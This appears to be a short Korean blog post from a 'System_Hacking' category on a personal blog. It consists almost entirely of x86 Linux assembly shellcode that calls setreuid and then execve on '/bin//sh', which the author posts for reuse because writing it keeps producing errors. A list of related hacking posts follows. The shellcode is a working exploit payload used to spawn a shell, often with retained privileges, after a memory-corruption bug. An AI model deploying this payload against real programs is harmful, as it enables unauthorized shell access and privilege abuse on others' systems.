main:
xor %eax,%eax
movb $0x18,%al
int
$0x80
movl %eax,%ebx
movl %ebx,%ecx
xor
%eax,%eax
movb $0x46,%al
int $0x80
xor %edx,%edx
xor %eax,%eax
movb
$0xb,%al
push %edx
push $0x68732f2f
push
$0x6e69622f
movl %esp,%ebx
push %edx
push
%ebx
movl %esp,%ecx
int $0x80
이놈의 쉘코드.. 짤때마다 짜증나게 오류가나네 --
미리 이렇게 올려놔야지...
'System_Hacking' 카테고리의 다른 글
레지스터 이해와 어셈블리 더블 포인터의 이해 (0) | 2012.03.21 |
---|---|
gdb 사용법 우분투에서 연습하기. (0) | 2012.03.21 |
%2f 가 없는 쉘코드 (shellcode without %2f code) (0) | 2012.03.21 |
리눅스 커널 심층 분석 내가 요약한 판.. (0) | 2012.03.21 |
스택옵션 변경하기 (changing Stack option) (랜덤스택 없애기 및 DEP 주기) (1) | 2012.03.21 |